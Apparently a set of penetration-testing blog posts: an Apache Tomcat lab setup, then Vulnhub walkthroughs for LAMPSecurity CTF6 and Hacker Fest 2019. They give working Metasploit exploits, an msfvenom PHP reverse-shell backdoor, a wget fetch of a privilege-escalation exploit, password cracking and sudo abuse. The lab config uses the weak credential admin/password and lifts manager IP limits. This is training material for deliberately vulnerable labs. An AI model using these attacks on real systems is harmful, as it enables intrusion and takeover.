Apache Tomcat Penetration Testing Lab Setup

In this article, we will learn the process of installing an Apache Tomcat on any Linux Machine. We will also learn how to gain control over our victim’s PC through exploiting Apache Tomcat.

Requirements:

Server/Victim Machine: Ubuntu 18.04

Pentesting Machine: Kali Linux

Table of Content

·         Introduction of Apache Tomcat

·         Installation of Apache Tomcat

·         Install apache2

·         Install java jdk

·         Download tomcat manager

·         Tomcat manager configuration

·         Create tomcat user and group

·         Assign permission

·         Create a systemd Service File

·         Update firewall to allow tomcat

·         Configure Tomcat Web Management Interface

·         Access the Web Interface

·         Exploiting Apache Tomcat

Introduction of Apache Tomcat

What is Apache Tomcat?

Apache Tomcat which is also known as Tomcat Server is a Java-Based HTTP Web Server. It implements Java EE Specifications like Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket. It is an open-source software made by developers at Apache Software Foundation. Apache has been released as early as 1999. That makes Apache Tomcat 20 years old at the time of publication of this article.

Apache Tomcat in its simplest configuration runs in a single operating system process. This process is commonly known as the Java virtual machine (JVM). This allows Apache Tomcat platform independent as well as secure as compared to others.

Installation of Apache Tomcat

INSTALL APACHE2 AND JAVA

Let’s start with apache tomcat installation but before that you should go with below command.

apt update

apt install apache2

Now, Apache Tomcat needs Java to be installed so that the Java Application code can be executed on the server. To make this possible, installed the Java Development Kit.

apt-get install default-jdk

CREATE USER AND GROUP

To run the tomcat as an unprivileged user, create a group and a new user named as tomcat. We have created the user in /opt because we are going to install tomcat in that directory. We don’t need the tomcat user to use the shell so we will be using the -s parameter to set /bin/false shell. By doing this authentication will get disabled for the tomcat user.

groupadd tomcat

cd opt

mkdir tomcat

useradd -s /bin/false -g tomcat -d /opt/tomcat tomcat

DOWNLOAD TOMCAT MANAGER

Now, we are going to download the apache tomcat Package from here.  After downloading it’s time to extract the package it inside /opt directory and move forward.

sudo tar xzvf apache-tomcat-9.0.24.tar.gz -C /opt/tomcat --strip-components=1

ASSIGN PERMISSIONS

Now we are going to use the chgrp command to give the ownership of the tomcat directory to the tomcat group.

cd /opt/tomcat

chgrp -R tomcat /opt/tomcat

To allow the tomcat group user to perform the read and execute operation change permission for /conf file as given below.

chmod -R g+r conf

chmod g+x conf

Also give ownership to the tomcat group user for directories like: webapp/, work/, temp/ and logs/.

chown -R tomcat webapps/ work/ temp/ logs/

We want Apache Tomcat to be run as a service and for that, we will have to set up a system service. To do this, we are going to require the location of the Java Installation. For this, we will be running the command given below.

update-java-alternatives -l

CREATE A SYSTEMD SERVICE FILE

To create a system service file, open the tomcat.service file in the /etc/systemd/system directory using nano editor.

nano /etc/systemd/system/tomcat.service

Now append the following content and modify the JAVA_HOME as shown below

 [Unit]

Description=Apache Tomcat Web Application Container

After=network.target

[Service]

Type=forking

Environment=JAVA_HOME=/usr/lib/jvm/java-1.11.0-openjdk-amd64

Environment=CATALINA_PID=/opt/tomcat/temp/tomcat.pid

Environment=CATALINA_HOME=/opt/tomcat

Environment=CATALINA_BASE=/opt/tomcat

Environment='CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC'

Environment='JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:/dev/./urandom'

ExecStart=/opt/tomcat/bin/startup.sh

ExecStop=/opt/tomcat/bin/shutdown.sh

User=tomcat

Group=tomcat

UMask=0007

RestartSec=10

Restart=always

[Install]

WantedBy=multi-user.target

Now Save this file. This will make tomcat a service.

Reload the systemd daemon to register our newly created tomcat service. If everything is done done correctly, we will able to run, stop and see the status of the Apache Tomcat as a service.

sudo systemctl daemon-reload

sudo systemctl start tomcat

sudo systemctl status tomcat

UPDATE FIREWALL TO ALLOW TOMCAT

It’s time to allow the tomcat via our firewall, Since Ubuntu has the ufw installed and set up by default. Apache Tomcat generally uses the post 8080 to receive requests from users.

sudo ufw allow 8080

Execute below command to start tomcat starts automatically whenever the machine boots up.

sudo systemctl enable tomcat

CONFIGURE TOMCAT WEB MANAGEMENT INTERFACE

At this stage, if you will browse the Server IP with the port 8080, you will be greeted with an Apache Tomcat Page. But if you will click on the links to the Manager App, you will get Access Denied. This means that you haven’t yet set up the Tomcat Web Manager Interface. So, let’s do that and complete the Apache Tomcat Setup.

Open the file using the nano editor and make the following changes as shown in the image given below.

sudo nano /opt/tomcat/conf/tomcat-users.xml

admin" password="password" roles="manager-gui,admin-gui"/>

You can change the username and password as per your choice. We will save and close the editor after making appropriate changes.

By default, Apache Tomcat restricts access to the Manager and Host Manager apps to connections coming from the server. As we are installing Tomcat for a remote machine, we will probably want to alter this restriction. To change the restrictions on these, we will be editing these context.xml files.

sudo nano /opt/tomcat/webapps/manager/META-INF/context.xml

Inside, comment out the IP address restriction to allow connections from anywhere. Alternatively, if you would like to allow access only to connections coming from your own IP address.

sudo nano /opt/tomcat/webapps/host-manager/META-INF/context.xml

We do the same thing with the host-manager file. To allow access to Host Manager too.

saved the changes restart the tomcat service.

systemctl restart tomcat

ACCESS THE WEB INTERFACE

We got to the interface by entering your server’s domain name or IP address followed on port 8080 in our browser. Now we will try to see if the Manager and Host Manager interfaces are working. Click the Buttons highlighted in the image.

The Login authentication page will pop-up as expected, we enter the credentials that we created earlier.

Upon verification of the credentials, Apache Tomcat lands us to this Tomcat Virtual Host Manager Interface. From this page, you can add virtual hosts to serve your applications. This concludes our Apache Tomcat Setup.

Exploiting Apache Tomcat

Now that we have successfully installed the Apache Tomcat Framework, Let’s do its Penetration Testing. We are going to use Metasploit for exploiting the Apache Tomcat.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload

msf5 exploit(multi/http/tomcat_mgr_upload) > set target 2

msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.0.23

msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf5 exploit(multi/http/tomcat_mgr_upload) > set httpUsername admin

msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword password

msf5 exploit(multi/http/tomcat_mgr_upload) > exploit 

As result, you can observe that we have the meterpreter session of the target machine.

meterpreter > shell

id 

Learn multiple way to exploit tomcat manager from here.

LAMPSecurity: CTF6 Vulnhub Walkthrough

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises too.

These exercises can be used for training purposes by following this documentation. Alternatively, you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.

Download from Here.

Penetration Testing Methodology

·         Network Scanning

o   netdiscover

o   nmap port scan

·         Enumeration

o   Performing Directory Bruteforce

o   Exploring directories to find out the username and password

·         Exploiting

o   Using a backdoor

o   Using netcat/msfconsole

·         Privilege Escalation

o   Changing the password of root and other users

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, to identify the target, we will use the following command:

netdiscover

Now we will use nmap to gain information about the open ports and the services running on the target machine using the following command

nmap -sV -sT -p- 192.168.43.30

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring different service. Here we have a web application so let’s explore the web application.

http://192.168.43.30

Further, let’s try to find some hidden files and directories. Finding files and directories can discover much useful information like username, password or some configuration files, etc. We will use the following command for the said:

dirb http://192.168.43.30

We found two major directories i.e. /files/ and /sql/. We can tell from their names that are quite important.

Now our next step is to explore these two directories. We can also explore other directories but the rest of the directories don’t seem to be useful for us.

http://192.168.43.30/files/

On exploring the files/ directory there multiple valid and useful files we found with a lot of information as you can see in the image below:

http://192.168.43.30/sql/db.sql/

Upon traversing through sql/ directory, we found a db.sql and when opened it gave us all the information about the database including username and password just as shown in the image below:

Now let’s try to login into the admin panel using the username: ‘admin’ and password: ‘adminpass’

We succeed in login. Now we have the admin panel from where we can manage the web application. Let’s see if we can add some more pages to the application so that we can upload a PHP backdoor.

As we can add a new event, so, here we will create a backdoor using msfvenom first and then we will upload this shell.php file on the website. To create the shell type:

msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248

After this, upload the shell by adding a new event as shown in the image below:

Finally, we have uploaded a malicious file. Now we will use msfconsole or we can also use netcat to get a session in order to perform more operations to gain root access.

So, to access the ‘shell.php’ we will explore the directory URL: http://192.168.43.30/files/

Now let’s fire up the msfconsole and we have to type in these commands in msfconsole to get a session

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.43.248

msf5 exploit(multi/handler) > set lport 4444

msf5 exploit(multi/handler) > exploit

Press enter after typing ‘exploit’ and go back to the URL: http://192.168.43.30/files/

And click on ‘shell.php’ and then come back to the msfconsole, now we can see we have got a session.

Now we have a session, so let’s run the command ‘sysinfo’ to find out some information related to kernel version and its architecture.

sysinfo

Kernel version is 2.6.18-92.el5 .

We have to search a lot to know more about this kernel version and after doing a lot of research we find out that this kernel version is vulnerable to udev exploit.

Now, we will use a script to gain root access, script name is 8478.sh, we can find this exploit/code in our Kali Linux OS.

Let’s copy this file from our OS to the directory where we have created our backdoor that is /root/Music using the cp command:

cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music

cd /root/Music/

ls -l

Now, let’s run a simple HTTP Server using python so that we can download this file in our targeted system.

python -m SimpleHTTPServer

Now let’s drop a shell in our targeted system using the same meterpreter session

sysinfo

This is a very limited shell. using this shell, we can’t do privilege escalation. Now for gaining a more advance shell, we will use python’s pty module using the following command

python -c 'import pty; pty.spawn("/bin/bash")'

Now we have a shell where we can try different commands to gain root access. First of all, let’s change the directory to /tmp using the cd command

cd /tmp

pwd

Now we have to download 8478.sh file here so that we can exploit the system. We can download the file using wget command:

wget http://192.168.43.248:8000/8478.sh -q

Now change the permissions to executable using the chmod command:

ls

chmod +x 8478.sh

It’s time to run the script and gain the root access, run the script using ‘./8478.sh’

./8478.sh

Many of us will get this error. We will search for this error and finally we have found a solution to this error we can resolve this issue using the following command:

sed -i -e 's/\r$//' 8478.sh

Try again to run the script using:

./8478.sh

The reason behind this error is, it requires some experimentation as you have to provide the proper PID to the script in order for the code to work. So now we have to find a proper PID and with the help of that PID, we will run the script. To get the PID run the following command:

cat /proc/net/netlink

Run the script again using the PID 376 using the command below:

./8478.sh 376

whoami

Boom! We have gained the root access!

Let’s do some more operations. Head into the /home directory using command cd /home. In the home directory, we have to find out more users. As we are root, we can change any user password using the command passwd john similarly we can change the root password using the same command.

passwd root

id

su john

su -l

ls

Author: Yash Saxena an undergraduate student pursuing B. Tech in Computer science and engineering with a specialization in cybersecurity and forensics from DIT University, Dehradun. Contact here.

Hacker Fest: 2019 Vulnhub Walkthrough

Hacker Fest:2019 VM is made by Martin Haller. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of easy level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Easy

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

·         Network Scanning

o   Nmap port scan

·         Enumeration

o   Browsing HTTP Service

o   Scanning Wordpress (wpscan)

·         Exploiting

o   Wordpress Google Maps Plugin SQL Injection

o   Wordpress_admin_shell_upload exploit

·         Privilege Escalation

o   Abusing Sudo Rights

Walkthrough

Network Scanning

Starting with netdiscover, to identify host IP address and thus we found 192.168.0.20. let’s now go for advance network scanning using the nmap Aggressive scan.

nmap -A 192.168.0.20

We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the ports 21 and 22  open. This tells us that we also have the FTP service, SSH Service running on the target machine.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the web browser.

This gave us a site that looks like a WordPress site, it’s time to perform a wpscan on the target machine.

wpscan --url http://192.168.0.20/wordpress

If we move further down in the wpscan result we find the WordPress google map plugin. It is not updated. So, this could help us. Let’s try and exploit it.

Exploiting Google Map Exploit

We searched the google maps on our Metasploit Framework.  This gave us this exploit. This exploit works on a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.

msf5 > use auxiliary/admin/http/wp google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit

So, we got the following hash through the sql injection that was on the target machine.

webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘kittykat1’.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as a result, it will give meterpreter session of the webserver.

msf5 > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.0.20

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1

msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit 

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

su webmaster

Password: kittykat1

Great!! It works wonderfully and you can see that we have owned the reverse connection of the web server via meterpreter session.

Privilege Escalation

On the other hands start your attacking machine and first compromise the target system and then move to the privilege escalation phase. After successful login in the victim’s machine now executes below command to know sudo rights for the current user.

sudo -l

sudo su

cd /root

ls

cat flag.txt